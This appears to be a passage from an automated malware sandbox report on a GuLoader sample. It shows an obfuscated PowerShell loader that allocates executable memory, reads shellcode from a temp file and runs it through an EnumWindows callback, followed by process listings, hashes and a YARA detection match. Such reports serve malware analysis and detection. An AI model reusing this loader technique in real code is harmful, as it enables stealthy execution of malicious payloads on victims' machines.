 [ D l l I m p o r t ( " g d i 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   E n u m F o n t s A ( s t r i n g   f e r s k v a , u i n t   p a r a p l e g , i n t   D E P O , i n t   R O T A T I O N F O 0 , i n t   H o v e , i n t   a f t e r r a k , i n t   S v i n g h j u l e 1 ) ;  
 [ D l l I m p o r t ( " K E R N E L 3 2 " ,   E n t r y P o i n t = " C r e a t e F i l e A " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   V i a c ( [ M a r s h a l A s ( U n m a n a g e d T y p e . L P S t r ) ] s t r i n g   f e r s k v a , u i n t   p a r a p l e g , i n t   D E P O , i n t   R O T A T I O N F O 0 , i n t   H o v e , i n t   a f t e r r a k , i n t   S v i n g h j u l e 1 ) ;  
 [ D l l I m p o r t ( " n t d l l " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   N t A l l o c a t e V i r t u a l M e m o r y ( i n t   R O T A T I O N F O 6 , r e f   I n t 3 2   T E R R A , i n t   M a n i o k p , r e f   I n t 3 2   R O T A T I O N F O , i n t   P h o n o l o , i n t   R O T A T I O N F O 7 ) ;  
 [ D l l I m p o r t ( " K E R N E L 3 2 " ,   E n t r y P o i n t = " R e a d F i l e " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   C D A C ( i n t   M a n i o k p 0 , u i n t   M a n i o k p 1 , I n t P t r   M a n i o k p 2 , r e f   I n t 3 2   M a n i o k p 3 , i n t   M a n i o k p 4 ) ;  
 [ D l l I m p o r t ( " U S E R 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   E n u m W i n d o w s ( I n t P t r   M a n i o k p 5 , i n t   M a n i o k p 6 ) ;  
  
 }  
 " @  
 # R u b i n e m a g t 5   M y k i s s   S t e n o 3   U D D A N N E L S E   E X A C T N E   L a u r   M o o n i 1   A D J O   B e m u r 1   I N S T   A d j u s t   F r e r p r v e 9   H j e r t e b a r   F l u t   H e d e n s k r a m   B u r m a n n i a   m u h a m   B e g y   H u a h u k u l i s 8   B a g b u 2   W A R S   M a s k e d b t t   d r y p s   s t o p p e g   S w e e 5   S O D F   b a r r   M a n g e r s f l a 9    
 $ R O T A T I O N F O 2 = " $ e n v : t e m p "   +   " \ r e t t e t a s t . d a t "  
 # n o n h e r e d   i n k a s s o   F u l d b   S e l v a n g   G n i d d e 2   S U R M O   B O D H I S A T T   Q U I S   e n s r e t t e n d   c r y p t o d i r e   H o m e r o o m p   S P A R E N D E S P   A n t i l i t   E B U L L   F o r b   V i l d f a 2   M i n a e a 1   s y g d o m f o r n   A l m i n d e l   D R U E S    
 $ R O T A T I O N F O 3 = 0 ;  
 $ R O T A T I O N F O 9 = 1 0 4 8 5 7 6 ;  
 $ R O T A T I O N F O 8 = [ R O T A T I O N F O 1 ] : : N t A l l o c a t e V i r t u a l M e m o r y ( - 1 , [ r e f ] $ R O T A T I O N F O 3 , 0 , [ r e f ] $ R O T A T I O N F O 9 , 1 2 2 8 8 , 6 4 )  
 # R e s u 5   S k l d t e 3   M A G N E T I S M   K a l k u 8   A e s c   D O R E S T A   G o a l p o   n a t b o r   S y n e r g e t i c 4   G y n a n d r a 1   K l a v i   W A N L A   G e l a   m i l j b e r   T o l s e y l   e p i p l   W O R S H   C o l e m   A n n u 1   L E V I G A T I N   s t a b s o f f i   i r o n   u b l u f r d i g    
 $ R O T A T I O N F O 4 = [ R O T A T I O N F O 1 ] : : V i a c ( $ R O T A T I O N F O 2 , 2 1 4 7 4 8 3 6 4 8 , 1 , 0 , 3 , 1 2 8 , 0 )  
 # P U M P E R N I   B R E P   R E N N E S I   B a b b o   S t y l t   N a z i s m e s c a 3   l a t e n e d r a   A L G E B R A I S   K e t t q u i   P n e u m a   A f g i f t   t e m p l o   S K I N D K A A B   F e r n i s e r e 1   r e c t i f i e   R A D I O A   g l o s s o   b e t a l i n g s e   F r i t u r e 2   s u b e t h a t   m e m o   U d a r b e j d e 3    
 $ R O T A T I O N F O 5 = 0 ;  
 # S v e l n i   T E R R E S T R I A   G r u m m e   R Y D H A N D G   S e c o n d e 2   r e q u i   M E R S T I G N   E m b r y o n a   K o r s v e j t r 3   i s d k k e d   S u b b a s 4   v e l l a b a g b   n o n f e r   V i r t u o s   K R O P S S   K A L F   A m t s r a a d s f 6    
 [ R O T A T I O N F O 1 ] : : C D A C ( $ R O T A T I O N F O 4 , $ R O T A T I O N F O 3 , 5 7 9 3 3 , [ r e f ] $ R O T A T I O N F O 5 , 0 )  
 # D Z O T O M M E S K   U d s k r i n g   S e m i a m 6   P u r l g   s y t t e n a   H y d r   E u r a s i e r e n   M u l t 3   U n s w i n   A d v o k 8   M a r i n e s t a   T e n d   P e l v e s r u a t 4   i n d d a t a f i l   A k a d e m i s 1   G A R U D A   E v e n t u 1   P R E S E N T I M   D i v u l 7   S p i l d e v a   S t y r k e   F o t o t e l   A u t o t 5   E A R T   H y d r a g o g y   B r i n c e u 9   T r i p l u   u n o r a l e s   S k e l e    
 [ R O T A T I O N F O 1 ] : : E n u m W i n d o w s ( $ R O T A T I O N F O 3 ,   0 )  
  
 
      Imagebase:0xf0000
      File size:430592 bytes
      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:.Net C# or VB.NET
      Yara matches:
      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000E.00000002.894432907.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
      Reputation:high

      Target ID:15
      Start time:13:34:12
      Start date:12/05/2022
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff7bab80000
      File size:625664 bytes
      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Target ID:21
      Start time:13:34:46
      Start date:12/05/2022
      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wwh3pdnv\wwh3pdnv.cmdline
      Imagebase:0x890000
      File size:2170976 bytes
      MD5 hash:350C52F71BDED7B99668585C15D70EEA
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:.Net C# or VB.NET
      Reputation:moderate

      Target ID:22
      Start time:13:34:49
      Start date:12/05/2022
      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESBAD5.tmp" "c:\Users\user\AppData\Local\Temp\wwh3pdnv\CSC196797DCDE8F47A0A151AAD0920D1B.TMP"
      Imagebase:0x830000
      File size:43176 bytes
      MD5 hash:C09985AE74F0882F208D75DE27770DFA
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      No disassembly